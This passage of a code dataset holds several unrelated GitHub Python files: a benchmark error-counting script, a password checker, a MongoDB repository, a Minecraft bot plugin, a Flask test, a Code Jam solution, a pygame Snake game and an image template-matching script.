(re.compile(r\"Floating-point under-/overflow occurred at epoch\"), \"under-/overflow\"),\n (re.compile(r\"removed all features!\"), \"Removed_all_features\"),\n (re.compile(r\"Input contains NaN\"), \"NaN\"),\n (re.compile(r\"Bug in scikit-learn\"), \"Scikit-learn_bug\"),\n (re.compile(r\"invalid value encountered in matmul\"), \"Invalid_value_in_matmul\"),\n]\n\n\ndef handle_exception(e):\n for _, (pattern, message) in enumerate(exception_patterns):\n if pattern.search(\n e.replace(\"\\n\", \" \")\n ): # replace line breaks with spaces for pattern search\n return message\n return \"other_exceptions\"\n\n\ndef count_exceptions_and_combinations(dataset_dir):\n error_config_ids = set()\n\n # Initialize empty data structures to count exceptions\n classifiers_counter = defaultdict(lambda: defaultdict(int))\n preprocessors_counter = defaultdict(lambda: defaultdict(int))\n combinations_counter = defaultdict(lambda: defaultdict(lambda: defaultdict(int)))\n dataset_counter = defaultdict(lambda: defaultdict(int))\n\n for root, dirs, files in os.walk(dataset_dir):\n if root == os.path.join(\n dataset_dir, \"errors\"\n ): # Only process files within an 'errors' subdirectory\n for file in files:\n if file.endswith(\".json\"):\n exception, error_log = handle_exception_and_read_file(\n os.path.join(root, file)\n )\n if error_log is None:\n continue\n\n # Identify type of exception\n exception = handle_exception(error_log[\"exception\"])\n\n # Count exceptions for each classifier\n classifier = error_log[\"config\"][\"classifier:__choice__\"]\n classifiers_counter[classifier][exception] += 1\n\n # Count exceptions for each preprocessor\n preprocessor = error_log[\"config\"][\"data_preprocessor:__choice__\"]\n preprocessors_counter[preprocessor][exception] += 1\n\n # Count exceptions for each combination\n combinations_counter[preprocessor][classifier][exception] += 1\n\n # Count exceptions for each dataset\n dataset_counter[os.path.basename(root)][exception] += 1\n\n # Add config_id to the error set\n error_config_ids.add(int(file.split(\".\")[0]))\n\n # Convert nested counters to pandas DataFrame\n df_classifiers = pd.DataFrame(classifiers_counter).transpose()\n df_classifiers[\"Total Count\"] = df_classifiers.sum(axis=1)\n df_classifiers[\"Percentage\"] = (\n df_classifiers[\"Total Count\"] / df_classifiers[\"Total Count\"].sum() * 100\n )\n\n df_preprocessors = 
pd.DataFrame(preprocessors_counter).transpose()\n df_preprocessors[\"Total Count\"] = df_preprocessors.sum(axis=1)\n df_preprocessors[\"Percentage\"] = (\n df_preprocessors[\"Total Count\"] / df_preprocessors[\"Total Count\"].sum() * 100\n )\n\n df_combinations = pd.concat(\n {\n (preprocessor, classifier): pd.Series(combinations)\n for preprocessor, classifiers in combinations_counter.items()\n for classifier, combinations in classifiers.items()\n },\n names=[\"Preprocessor\", \"Classifier\"],\n )\n df_combinations = df_combinations.unstack(fill_value=0)\n df_combinations[\"Total Count\"] = df_combinations.sum(axis=1)\n df_combinations[\"Percentage\"] = (\n df_combinations[\"Total Count\"] / df_combinations[\"Total Count\"].sum() * 100\n )\n\n # Convert dataset_counter to DataFrame\n df_datasets = pd.DataFrame(dataset_counter).transpose()\n df_datasets[\"Total Count\"] = df_datasets.sum(axis=1)\n for column in df_datasets.columns:\n if column != \"Total Count\":\n df_datasets[f\"{column} Percentage\"] = (\n df_datasets[column] / df_datasets[\"Total Count\"] * 100\n )\n\n return (\n df_combinations,\n df_classifiers,\n df_preprocessors,\n df_datasets,\n error_config_ids,\n )\n\n\ndef calculate_stats_for_dataset(dataset_dir):\n config_dir = os.path.join(dataset_dir, \"configurations\")\n configs = len(os.listdir(config_dir)) if os.path.exists(config_dir) else 0\n configs_percentage = (configs / total_jobs) * 100\n\n labels_dir = os.path.join(dataset_dir, \"labels\")\n labels = len(os.listdir(labels_dir)) if os.path.exists(labels_dir) else 0\n labels_percentage = (labels / configs) * 100 if configs else 0\n\n errors_dir = os.path.join(dataset_dir, \"errors\")\n errors = len(os.listdir(errors_dir)) if os.path.exists(errors_dir) else 0\n errors_percentage = (errors / configs) * 100 if configs else 0\n\n dataset_name = os.path.basename(dataset_dir)\n\n return [\n dataset_name,\n f\"{configs} ({configs_percentage:.2f}%)\",\n f\"{labels} ({labels_percentage:.2f}%)\",\n f\"{errors} ({errors_percentage:.2f}%)\",\n ]\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Process datasets.\")\n parser.add_argument(\n \"--worker_dir\",\n type=str,\n help=\"The root directory to process\",\n default=\"/work/ws/nemo/fr_mj237-pipeline_bench-0/pipeline_bench\",\n )\n parser.add_argument(\n \"--n_jobs\", type=int, help=\"The number of jobs to run in parallel\", default=64\n )\n args = parser.parse_args()\n\n # Total exceptions\n total_exceptions = Counter()\n # Total expected jobs\n total_jobs = 10000\n # Get a list of directories\n root_directory = args.worker_dir\n dirs = sorted(\n (\n d\n for d in os.listdir(root_directory)\n if os.path.isdir(os.path.join(root_directory, d))\n ),\n key=int,\n )\n dataset_dirs = [os.path.join(root_directory, dir) for dir in dirs]\n\n # table = PrettyTable()\n # table.field_names = [\"Dataset\", \"Registered Jobs (Configs)\", \"Successful Jobs (Labels)\", \"Errors\"]\n\n # with parallel_backend('loky', inner_max_num_threads=1):\n # rows = Parallel(n_jobs=args.n_jobs)(delayed(calculate_stats_for_dataset)(dataset_dir) for dataset_dir in dataset_dirs)\n\n # for row in rows:\n # table.add_row(row)\n\n # print(table)\n\n with parallel_backend(\"loky\", inner_max_num_threads=1):\n results = Parallel(n_jobs=args.n_jobs)(\n delayed(count_exceptions_and_combinations)(dataset_dir)\n for dataset_dir in dataset_dirs[:10]\n )\n\n (\n dfs_combinations,\n dfs_classifiers,\n dfs_preprocessors,\n dfs_datasets,\n error_config_ids,\n ) = zip(*results)\n\n 
dfs_datasets = pd.concat(\n        [\n            df.assign(Dataset=dataset_dir)\n            for df, dataset_dir in zip(dfs_datasets, dataset_dirs[:10])\n        ],\n        ignore_index=True,\n    )\n\n    print(\"\\nDatasets:\\n\", dfs_datasets)\n    dfs_datasets.to_csv(os.path.join(args.worker_dir, \"datasets_report.csv\"))\n    # print(\"Combinations:\\n\", dfs_combinations)\n    # print(\"\\nClassifiers:\\n\", dfs_classifiers)\n    # print(\"\\nPreprocessors:\\n\", dfs_preprocessors)\n    print(\"\\nCommon error config_ids across all datasets:\", len(set.intersection(*error_config_ids)))\n\n    # Save the dataframes to CSV files\n    # dfs_classifiers.to_csv(os.path.join(args.worker_dir, 'classifiers_report.csv'))\n    # dfs_preprocessors.to_csv(os.path.join(args.worker_dir, 'preprocessors_report.csv'))\n    # dfs_combinations.to_csv(os.path.join(args.worker_dir, 'combinations_report.csv'))\n\n    # Save the pretty table to a txt file\n    # with open(os.path.join(args.worker_dir, 'table_report.txt'), 'w') as f:\n    #     f.write(str(table))\n","repo_name":"releaunifreiburg/Pipeline-Bench","sub_path":"pipeline_bench_examples/check_status.py","file_name":"check_status.py","file_ext":"py","file_size_in_byte":8784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
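In the record above, "Common error config_ids across all datasets" refers to the intersection of the per-dataset error id sets returned by count_exceptions_and_combinations. The standalone sketch below uses hypothetical values (not benchmark output) to contrast that intersection with the plain total.

# error_config_ids here mimics the tuple of sets produced by zip(*results)
error_config_ids = ({1, 2, 3}, {2, 3, 4}, {3, 4, 5})

total_errors = sum(len(ids) for ids in error_config_ids)   # 9: errors summed over datasets
common_errors = set.intersection(*error_config_ids)        # {3}: configs failing in every dataset

print("Total error configs:", total_errors)
print("Common error config_ids across all datasets:", len(common_errors))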
+{"seq_id":"72327820033","text":"s=input()\r\n\r\nnum={chr(i) for i in range(47,58)}\r\nlow={chr(i) for i in range(65,91)}\r\nupp={chr(i) for i in range(97,123)}\r\n\r\nn=0\r\nsp=0\r\n\r\nif len(s)<7:\r\n print('Weak')\r\nelse:\r\n for i in s:\r\n if i in num:\r\n n+=1\r\n elif i not in low|upp:\r\n sp+=1\r\n else:\r\n if n>=2 and sp>=2:\r\n print('Strong')\r\n else:\r\n print('Weak')\r\n","repo_name":"deeware/Python_Programs","sub_path":"password_validator.py","file_name":"password_validator.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"40098610271","text":"import copy\nfrom typing import List\n\nfrom bson import ObjectId\n\nimport json\n\nfrom main.domain.common.repository import Repository\nfrom main.domain.model.user import User\nfrom main.infrastructure.mongo_service import MongoService\nfrom main.infrastructure.repository.account_repository import AccountRepository\nfrom main.infrastructure.repository.entity_mapper import UserEntityMapper\n\n\nclass UserRepository(Repository):\n\n def __init__(self,\n mongo_service: MongoService,\n account_repo: AccountRepository):\n self.__user_collection = mongo_service.collection(\"users\")\n self.__user_mapper = UserEntityMapper()\n self.__account_repo = account_repo\n\n def list(self) -> List[User]:\n pipeline = [{\n \"$lookup\": {\n \"from\": \"accounts\",\n \"localField\": \"account_ids\",\n \"foreignField\": \"_id\",\n \"as\": \"accounts\"\n }\n }]\n\n dbo_list = self.__user_collection.aggregate(pipeline)\n return [self.__user_mapper.to_domain_model(dbo) for dbo in dbo_list]\n\n def get_user_by_id(self, id: str):\n \"\"\"\n Gets a user by their `id` and returns the user. If no user with `id` is found, then return `None`.\n \"\"\"\n\n pipeline = [\n {\n \"$match\": {\n \"_id\": ObjectId(id)\n }\n },\n {\n \"$lookup\": {\n \"from\": \"accounts\",\n \"localField\": \"account_ids\",\n \"foreignField\": \"_id\",\n \"as\": \"accounts\"\n }\n }\n ]\n\n dbo = next(self.__user_collection.aggregate(pipeline))\n return self.__user_mapper.to_domain_model(dbo)\n\n def save(self, user: User) -> User:\n dbo = self.__user_mapper.from_domain_model(user)\n\n # Save all accounts to the DB\n [self.__account_repo.save(account) for account in user.accounts]\n\n if user.id:\n result = self.__user_collection.update_one({'_id': ObjectId(user.id)}, {'$set': dbo}, upsert=True)\n return user\n\n # If no user ID exists\n else:\n result = self.__user_collection.insert_one(dbo)\n\n # Copying to prevent modifying the previous user object\n new_user = copy.deepcopy(user)\n new_user.id = result.inserted_id\n return new_user\n","repo_name":"Ray-F/consolidate","sub_path":"server/main/infrastructure/repository/user_repository.py","file_name":"user_repository.py","file_ext":"py","file_size_in_byte":2436,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"18766953373","text":"from mcdreforged.api.all import *\n\nfrom mcdr_bot_manager.text import WORLD_NAME\n\n\nclass Botinfo:\n\n def __init__(self,\n name: str,\n info: str = '临时加载',\n pos: tuple[int, int, int] = [0, -1, 0],\n facing: tuple[int, int] = [-1, 0],\n world: int = -1):\n self.name = name\n self.info = info\n self.pos = pos\n self.facing = facing\n self.world = int(world)\n\n\nclass Bot:\n\n def __init__(self, server: PluginServerInterface, info: Info, Botinfo: Botinfo, qtype=False):\n self.info = Botinfo\n self.qtype = qtype\n #spawm\n if info is not None and info.is_player:\n cmd = f'execute at {info.player} run player bot_{self.info.name} spawn{self.spawn_argument()}'\n else:\n cmd = f'player bot_{self.info.name} spawn{self.spawn_argument()}'\n server.execute(cmd)\n\n def kill(self, server: PluginServerInterface):\n server.execute(f'player bot_{self.info.name} kill')\n\n def spawn_argument(self) -> str:\n temp_command: str = ''\n if self.info.pos[1] == -1:\n return temp_command\n temp_command += f' at {self.info.pos[0]} {self.info.pos[1]} {self.info.pos[2]}'\n if self.info.facing[0] == -1:\n return temp_command\n temp_command += f' facing {self.info.facing[0]} {self.info.facing[1]}'\n if self.info.world == -1:\n return temp_command\n temp_command += f' in {WORLD_NAME[int(self.info.world)]}'\n return temp_command\n","repo_name":"mccube2000/MCDR-Bot-manager","sub_path":"mcdr_bot_manager/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"71619619073","text":"from app.tests import BaseTestClass\nfrom app.models import Store\n\n\nclass SetupApiTestCase(BaseTestClass):\n\n def test_setup_endpoint(self):\n with self.app.app_context():\n stores = Store.query.all()\n self.assertEqual(0, len(stores))\n res = self.client.get('/setup', follow_redirects=True)\n self.assertEqual(201, res.status_code)\n stores = Store.query.all()\n self.assertEqual(3, len(stores))\n","repo_name":"AlarconZQL/MinimartAPI","sub_path":"app/tests/test_setup_api.py","file_name":"test_setup_api.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"40799037843","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Snake - v2.1\n# Ce script est un programme du jeu snake\n# License libre CC BY 4.0\n# Colin Laganier - Thomas Le Menestrel - 2018.05.13\n\n#Importation des bibliothèques nécessaires\nfrom pygame.locals import *\nfrom random import randint\nimport pygame\nimport time\n\n#Définition des variables intervenant dans le jeu\nx = [0]\ny = [0]\nstep = 23\nscore = 0\nhighscore = 0\nlength = 3\netat = 1\nmenu = 1\nsize_barre = 70\nvitesse = 75.0\n\n#Création d'un grand nombre de rangs au sein de la liste pour éventuellement agrandir le corps du serpent jusqu'à 1000 sections\nfor i in range(0,1000):\n x.append(-100)\n y.append(-100)\n\n#Fonction définissant si il y a une collision entre les coordonnées du serpent et d'autres coordonnées, comme celles des fruits ou des différentes parties du serpent\ndef collision(x1,y1,x2,y2, size_snake, size_fruit):\n if ((x1 + size_snake >= x2) or (x1 >= x2)) and x1 <= x2 + size_fruit:\n if ((y1 >= y2) or (y1 + size_snake >=y2)) and y1 <= y2 + size_fruit:\n return True\n return False\n\n#Fonction qui affiche le score du joueur sur la page de jeu\ndef disp_score(score):\n font = pygame.font.SysFont(None, 25)\n text = font.render(\"Score: \"+str(score), True, (0, 0, 0))\n fenetre.blit(text,(400,0))\n\n#Fonction qui centre le texte donnée entre deux coordonnées\ndef disp_text(info,x,y):\n font18 = pygame.font.SysFont(None, 18)\n text = font18.render((info),True,(0,0,0))\n textX = text.get_rect().width\n textY = text.get_rect().height\n fenetre.blit(text,((x - (textX / 2)),(y - (textY / 2))))\n\n#Initialisation de la bibliothèques Pygame\npygame.init()\n\n#Chargement des bruitages du jeu\nbruit_mouvement = pygame.mixer.Sound(\"move.wav\")\nbruit_collision = pygame.mixer.Sound(\"collision.wav\")\n\n#Création de la fenêtre\nfenetre = pygame.display.set_mode((500, 500))\nfenetre_rect = fenetre.get_rect()\n\n#La fenêtre de jeu est nommée\npygame.display.set_caption(\"Snake\")\n\n#Chargement d'un fond blanc avec lequel la fenêtre est remplie\ncouverture = pygame.Surface(fenetre.get_size())\ncouverture = couverture.convert()\ncouverture.fill((250, 250, 250))\nfenetre.blit(couverture, (0,0))\n\n#Chargement des images des différents objets du jeu\nhead = pygame.image.load(\"head.png\").convert_alpha() # La tête\nhead = pygame.transform.scale(head, (35,35))\ncorps1 = pygame.image.load(\"corps.png\").convert_alpha() #Le corps\ncorps1 = pygame.transform.scale(corps1, (25,25))\nfruit = pygame.image.load(\"fruit.png\").convert_alpha() #Le fruit\nfruit = pygame.transform.scale(fruit, (35,35))\n\n#Récuperation de leur position\nposition_1 = head.get_rect()\nposition_fruit = fruit.get_rect()\n\n#Insertion des coordonnées de la tête dans leur liste respective\nx[0] = position_1.x\ny[0] = position_1.y\n\n#Position aléatoire est donnée au premier fruit, proche du joueur\nposition_fruit.x = randint(2,10)*step\nposition_fruit.y = randint(2,10)*step\n\n#Rafraichissement de l'écran\npygame.display.flip()\n\n#Variable qui continue la boucle principale du jeu\ncontinuer = True\ndepUp = depDown = depRight = depLeft = move_init = False\n#Changement de la variable de déplacement\nwhile(continuer):\n for event in pygame.event.get(): #Récupération des différents évènements du joueur\n if event.type == pygame.QUIT or (event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE):#Vérification de si le joueur ne quitte pas le jeu\n continuer = False\n if event.type == pygame.KEYDOWN:#Vérification de si le joueur 
appuye sur une des touches du clavier\n\n if event.key == pygame.K_UP:\n if etat == 2: #Vérification de si le programme est à l'état de jeu\n if depUp == False and move_init == True:#Vérification que la direction soit différente et annonce que les déplacement on débutés\n if depDown == True:# Empêchement d'aller dans la direction opposée\n depUp == False\n else:\n depDown = depRight = depLeft = False #Changement de la variable de déplacement\n depUp = move_init = True\n pygame.mixer.Sound.play(bruit_mouvement)\n\n if event.key == pygame.K_DOWN:\n if etat == 2:\n if depDown == False:# Empêchement d'aller dans la direction opposée\n if depUp == True:\n depDown == False\n else:\n depRight = depLeft = depUp = False #Changement de la variable de déplacement\n depDown = move_init = True\n pygame.mixer.Sound.play(bruit_mouvement)\n\n if event.key == pygame.K_RIGHT:\n if etat == 1 and menu == 3:\n if size_barre >=0 and size_barre <=130:\n size_barre = size_barre + 10\n vitesse = vitesse - 7.5\n if etat == 2:\n if depRight == False: # Empêchement d'aller dans la direction opposée\n if depLeft == True:\n depRight == False\n else:\n depLeft = depUp = depDown = False #Changement de la variable de déplacement\n depRight = move_init = True\n pygame.mixer.Sound.play(bruit_mouvement)\n\n if event.key == pygame.K_LEFT:\n if etat == 1 and menu == 3:\n if size_barre >=10 and size_barre <=140:\n size_barre = size_barre - 10\n vitesse = vitesse + 7.5\n if etat == 2:\n if depLeft == False:\n if depRight == True:# Empêchement d'aller dans la direction opposée\n depLeft == False\n else:\n depRight = depDown = depUp = False #Changement de la variable de déplacement\n depLeft = move_init = True\n pygame.mixer.Sound.play(bruit_mouvement)\n\n if event.key == pygame.K_RETURN:\n #Remplissage de l'écran en blanc pour effacer les parties du corps précédentes\n couverture.fill((250,250,250))\n fenetre.blit(couverture, (0,0))\n pygame.display.flip()\n\n if etat == 1:\n etat = 2\n\n #Remise de tous les paramètres du jeu à ceux de départ pour la nouvelle partie\n if etat == 3:\n depUp = depDown = depRight = depLeft = move_init = False\n length = 3\n for i in range (2, 1000):\n x[i] = y[i] = -100\n x[0] = y[0] = 0\n x[1] = -5\n y[1] = 5\n position_fruit.x = randint(2,10)*step\n position_fruit.y = randint(2,10)*step\n score = 0\n etat = 2\n\n #Définition d'une commande pour retourner au menu de depart apres avoir joué\n if event.key == pygame.K_SPACE:\n if etat == 1:\n if menu == 2 or menu == 3 or menu == 4:\n menu = 1\n if etat == 3: #Si le joueur perd\n depUp = depDown = depRight = depLeft = move_init = False #Les variables de déplacement deviennent fausses\n length = 3 #Remise de tous les paramètres du jeu à ceux de départ pour la nouvelle partie\n for i in range (2, 1000):\n x[i] = y[i] = -100\n x[0] = y[0] = 0\n x[1] = -5\n y[1] = 5\n position_fruit.x = randint(2,10)*step\n position_fruit.y = randint(2,10)*step\n score = 0\n etat = menu = 1\n\n if event.key == pygame.K_c: #Accès à la page des contrôles\n if etat == 1 and menu == 1:\n menu = 2\n\n if event.key == pygame.K_p:#Accès à la page des paramètres\n if etat == 1 and menu == 1:\n menu = 3\n\n if event.key == pygame.K_r:#Possibilité de remettre la vitesse à sa valeur initiale\n if etat == 1 and menu == 3:\n size_barre = 70\n vitesse = 75.0\n if event.key == pygame.K_w:#Accès à la page des crédits\n if etat == 1 and menu == 1:\n menu = 4\n\n #Etat du Menu principale\n if etat == 1:\n\n #Chargement du fond d'écran du menu\n couverture_menu = 
pygame.image.load(\"fond2.png\").convert()\n fenetre.blit(couverture_menu, (0,0))\n\n if menu == 1:\n #Carré est déssiné pour donner les informations au joueur\n pygame.draw.rect(fenetre,(0,255,0),(290,290,200,200))\n pygame.draw.rect(fenetre,(0,200,0),(290,290,200,200),5)\n\n #Explication au joueur de comment entre dans le jeu\n disp_text(\"Appuyez sur Entrer pour jouer\",390,320)\n\n #Explication au joueur de quels touches utiliser pour jouer\n disp_text(\"Appuyez sur C pour voir les\",390,360)\n disp_text(\"commandes\",390,380)\n disp_text(\"Appuyez sur P pour les\",390,420)\n disp_text(\"paramètres\",390,440)\n font14 = pygame.font.SysFont(None, 14)\n text = font14.render(\"Appuyez sur W pour les crédits\",True,(0,0,0))\n fenetre. blit(text, (320,470))\n pygame.display.flip()\n\n if menu == 2:\n #Carré est déssiné pour donner les informations au joueur\n pygame.draw.rect(fenetre,(0,255,0),(290,290,200,200))\n pygame.draw.rect(fenetre,(0,200,0),(290,290,200,200),5)\n\n #Explication au joueur comment jouer\n disp_text(\"Commandes de jeu :\",390,310)\n font18 = pygame.font.SysFont(None, 18)\n text = font18.render(\"Déplacements :\",True,(0,0,0))\n fenetre. blit(text, (300,330))\n controls = pygame.image.load(\"keypad.png\").convert_alpha()\n controls = pygame.transform.scale(controls, (90,80))\n fenetre.blit(controls, (340,350))\n disp_text(\"Appuyez sur échap pour quitter le\",390,445)\n disp_text(\"jeu\",390,460)\n\n #Explication au joueur comment sortir des menus\n font15 = pygame.font.SysFont(None, 15)\n text = font15.render((\"Appuyez sur espace pour retourner\"),True,(0,0,0))\n fenetre.blit(text,(305,475))\n pygame.display.flip()\n\n if menu == 3:\n #Carré est déssiné pour donner les informations au joueur\n pygame.draw.rect(fenetre,(0,255,0),(290,290,200,200))\n pygame.draw.rect(fenetre,(0,200,0),(290,290,200,200),5)\n\n #Mise en place du curseur pour modifier la vitesse du serpent\n disp_text(\"Vitesse de déplacement :\",390,320)\n pygame.draw.rect(fenetre,(235,51,36),(320,350,size_barre,15))\n pygame.draw.rect(fenetre,(0,200,0),(320,350,140,15),3)\n disp_text(\"Appuez sur <- et -> pour modifier\",390,380)\n disp_text(\"Appuyez sur R pour les\",390,430)\n disp_text(\"paramètres initiaux\",390,450)\n font15 = pygame.font.SysFont(None, 15)\n\n #Explication au joueur comment sortir des menus\n text = font15.render((\"Appuyez sur espace pour retourner\"),True,(0,0,0))\n fenetre.blit(text,(305,475))\n pygame.display.flip()\n\n if menu == 4:\n #Carré est déssiné pour donner les informations au joueur\n pygame.draw.rect(fenetre,(0,255,0),(290,290,200,200))\n pygame.draw.rect(fenetre,(0,200,0),(290,290,200,200),5)\n\n #Représentation des informations\n disp_text(\"Crédits:\",390,310)\n disp_text(\"Image tête du serpent: MegaPixel\",390,350)\n disp_text(\"Bruit du mouvement: Jeckkech\",390,380)\n disp_text(\"Bruit de collision: ProjectsU012\",390,410)\n disp_text(\"Voir README.md pour les liens\",390,440)\n\n #Explication au joueur comment sortir des menus\n font15 = pygame.font.SysFont(None, 15)\n text = font15.render((\"Appuyez sur espace pour retourner\"),True,(0,0,0))\n fenetre.blit(text,(305,475))\n pygame.display.flip()\n\n #Etat du jeu en cours\n if etat == 2:\n\n #Chargement des objets dans le jeu\n fenetre.blit(corps1, (-5,5))\n fenetre.blit(head, (0,0))\n\n #Coordonnées du morceau précédent données à chaque morceau\n for i in range(length-1,0,-1):\n x[i] = x[i-1]\n y[i] = y[i-1]\n\n couverture.fill((250, 250, 250)) #Remplissage de l'écran en blanc pour effacer les parties du 
corps précédentes\n for i in range(1,length): #Chargement du corps du serpent\n couverture.blit(corps1, (x[i], y[i]))\n\n # Modification de la position de la tête du serpent\n if depUp:\n y[0] = y[0] - step #Déplacement de la position de la tête\n fenetre.blit(couverture, (0,0)) #Chargement du fond d'écran, de la tête\n fenetre.blit(head, (x[0], y[0]))\n\n if depDown:\n y[0] = y[0] + step\n fenetre.blit(couverture, (0,0))\n fenetre.blit(head, (x[0], y[0]))\n\n if depRight:\n x[0] = x[0] + step\n fenetre.blit(couverture, (0,0))\n fenetre.blit(head, (x[0], y[0]))\n\n if depLeft:\n x[0] = x[0] - step\n fenetre.blit(couverture, (0,0))\n fenetre.blit(head, (x[0], y[0]))\n\n #Verification que le serpent ne touche pas les bords\n if x[0] < fenetre_rect.left:\n pygame.mixer.Sound.play(bruit_collision)\n etat = 3\n if x[0] + 35 > fenetre_rect.right:\n pygame.mixer.Sound.play(bruit_collision)\n etat = 3\n if y[0] < fenetre_rect.top:\n pygame.mixer.Sound.play(bruit_collision)\n etat = 3\n if y[0] + 35 > fenetre_rect.bottom:\n pygame.mixer.Sound.play(bruit_collision)\n etat = 3\n\n #Chargement du fruit\n fenetre.blit(fruit, position_fruit)\n\n #Verification de si le serpent touche un fruit\n if collision(x[0], y[0], position_fruit.x, position_fruit.y,35,25):\n position_fruit.x = randint(1,20)*step #Nouvelles coordonnées du fruit lorsqu'il est \"mangé\"\n position_fruit.y = randint(1,20)*step\n for j in range(0,length):\n \twhile collision(position_fruit.x, position_fruit.y, x[j], y[j],35,25):\n \t\tposition_fruit.x = randint(1,20)*step #Nouvelles coordonnées du fruit si les premieres insérés ont les même coordonnées que le corps du serpent\n \t\tposition_fruit.y = randint(1,20)*step\n length = length + 2\n score = score + 1\n\n #Vérification de si la tête du serpent touche un morceau du corps\n \n if collision(x[0], y[0], x[i], y[i],0,0) and move_init:\n pygame.mixer.Sound.play(bruit_collision)\n etat = 3\n\n #Ajout du score à l'écran\n disp_score(score)\n #Definition du meilleur score parmi les parties jouées\n if score > highscore:\n highscore = score\n\n pygame.display.flip()\n\n #Ajout d'un retard à la boucle pour obtenir la vitesse de déplacement voulue\n time.sleep (vitesse / 1000.0)\n\n #Etat de la partie terminée\n if etat == 3:\n\n #Chargement d'un cadre pour donner les informations au joueur\n pygame.draw.rect(fenetre,(0,255,0),(150,150,200,200))\n pygame.draw.rect(fenetre,(0,200,0),(150,150,200,200),5)\n\n #Chargement du score de la partie terminé dans le cadre\n disp_text(\"Score: \" + str(score),250,180)\n\n #Chargement du meilleur score parmi les parties réalisés dans le cadre\n disp_text(\"Meilleur score : \" + str(highscore),250,230)\n\n #Explication au joueur pour comment rejouer\n disp_text(\"Pour rejouer appuyez sur Entrer !\",250, 280)\n\n #Explication au joueur pour comment retourner au menu\n disp_text(\"Pour retourner au menu appuyez\", 250,305)\n disp_text(\"sur la barre d'espace !\",250,320)\n\n pygame.display.flip()\n\n#Sortie du jeu\npygame.quit()\n","repo_name":"tlemenestrel/Snake-Game","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":16584,"program_lang":"python","lang":"fr","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"31149620554","text":"from sys import stdin, stdout\nfrom fractions import Fraction\ncin, cout = stdin.readline, stdout.write\nfor t in xrange(1, int(cin())+1):\n n, l = map(long, cin().split())\n arr = map(long, cin().split())\n primes = dict()\n for i in xrange(l):\n for j in xrange(i,l):\n v = str(Fraction(arr[i],arr[j]))\n v_ = str(arr[i]) + '/' + str(arr[j])\n if v!='1' and v!=v_:\n values = v.split('/')\n primes[values[0]] = 0\n primes[values[1]] = 0\n e = arr[i]/long(values[0])\n primes[str(e)] = 0\n found = 0\n primes = sorted([long(prime) for prime in primes]) \n index = [0 for i in xrange(l+1)]\n for i in xrange(1,l):\n v = str(Fraction(arr[i-1],arr[i]))\n v_ = str(arr[i-1]) + '/' + str(arr[i])\n if v!='1' and v!=v_:\n values = v.split('/')\n index[i-1] = long(values[0])\n index[i+1] = long(values[1])\n index[i] = arr[i]/long(values[1])\n found = i\n for i in xrange(found, l):\n if index[i+1]==0:\n index[i+1] = arr[i]/index[i]\n for i in xrange(found, 0, -1):\n if index[i-1] == 0:\n index[i-1] = arr[i-1]/index[i]\n ans = \"\".join( chr(ord('A') + primes.index(num)) for num in index)\n cout(\"Case #%d: %s\\n\"%(t, ans)) ","repo_name":"phantomhieve/CP","sub_path":"2019/codejam/Qualifiers/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"9399811228","text":"\"\"\"\nName: Carlos Meza\nDescription:\n Using two images of different sizes, find the smaller(template image) within the bigger(main image)\n using the match template function from skimage feature.\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nfrom skimage.feature import match_template\n\n# Function for displaying image\ndef show_images(n, image, title):\n plt.figure(n)\n plt.imshow(image, cmap = plt.cm.gray)\n plt.title(title)\n\n# Convert an image into greyscale\ndef rgb2gray(rgb):\n return np.dot(rgb[...,:3], [0.2989, 0.5870, 0.1140])\n\n# Function that finds best match for the template in the main image\ndef findImage(mainImage, template) :\n # Read both images\n temp_main = mpimg.imread(mainImage)\n temp_small = mpimg.imread(template)\n \n # Convert both images into grayscale\n main = rgb2gray(temp_main)\n small = rgb2gray(temp_small)\n \n # Create an array of those pixel values\n main_data = np.array(main, dtype=None)\n template_data = np.array(small, dtype=None)\n \n # Print out both original images in greyscale\n show_images(0, main_data, \"Main Image w/ greyscale\")\n show_images(1, template_data, \"Template image w/ greyscale\")\n\n # Apply the match template function\n result = match_template(main_data, template_data, pad_input=True)\n \n # Variables to hold index values, size of half of template\n temp_row = int(len(template_data) / 2)\n temp_col = int(len(template_data[0]) / 2)\n rows = 0\n cols = 0\n temp = result[0][0]\n i = 0\n\n # Loop through main image and find highest correlation value as center\n while(i <= int(len(result)) - 1):\n k = 0\n while(k <= int(len(result)) - 1):\n if(result[i][k] > temp):\n temp = result[i][k]\n rows = i\n cols = k\n k += 1\n i += 1\n\n # Assign index values on main image to know area of template\n beg_row = rows - temp_row\n beg_col = cols - temp_col\n rows = rows + temp_row\n cols = cols + temp_col \n\n # Black out the image from the main image with index values\n main_data[beg_row:rows, beg_col:cols] = 0\n\n # Plot out final image with black square where template is found\n show_images(2, main_data, \"Main image w/ template removed\")\n plt.show()\n \n############# main #############\nif __name__ == \"__main__\":\n mainImage = \"ERBwideColorSmall.jpg\"\n template = \"ERBwideTemplate.jpg\"\n findImage(mainImage, template)\n","repo_name":"cmeza432/Template_Matching","sub_path":"templateMatching.py","file_name":"templateMatching.py","file_ext":"py","file_size_in_byte":2505,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
